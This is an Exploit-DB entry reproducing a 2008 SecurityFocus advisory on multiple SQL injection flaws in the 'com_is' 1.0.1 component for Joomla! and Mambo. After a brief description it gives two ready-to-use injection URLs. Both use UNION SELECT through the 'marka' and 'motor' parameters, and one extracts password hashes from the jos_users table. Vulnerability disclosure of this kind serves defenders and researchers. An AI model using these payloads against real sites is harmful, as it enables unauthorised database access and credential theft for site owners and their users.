Joomla! and Mambo 'com_is' 1.0.1 Component Multiple SQL Injection Vulnerabilities

2008-07-02T00:00:00
ID EDB-ID:32010
Type exploitdb
Reporter H-T Team
Modified 2008-07-02T00:00:00

Description

Joomla! and Mambo 'com_is' 1.0.1 Component Multiple SQL Injection Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/30063/info

The 'com_is' component for Joomla! and Mambo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

These issues affect 'com_is' 1.0.1; other versions may also be affected. 

http://www.example.com/index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**
http://www.example.com/index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--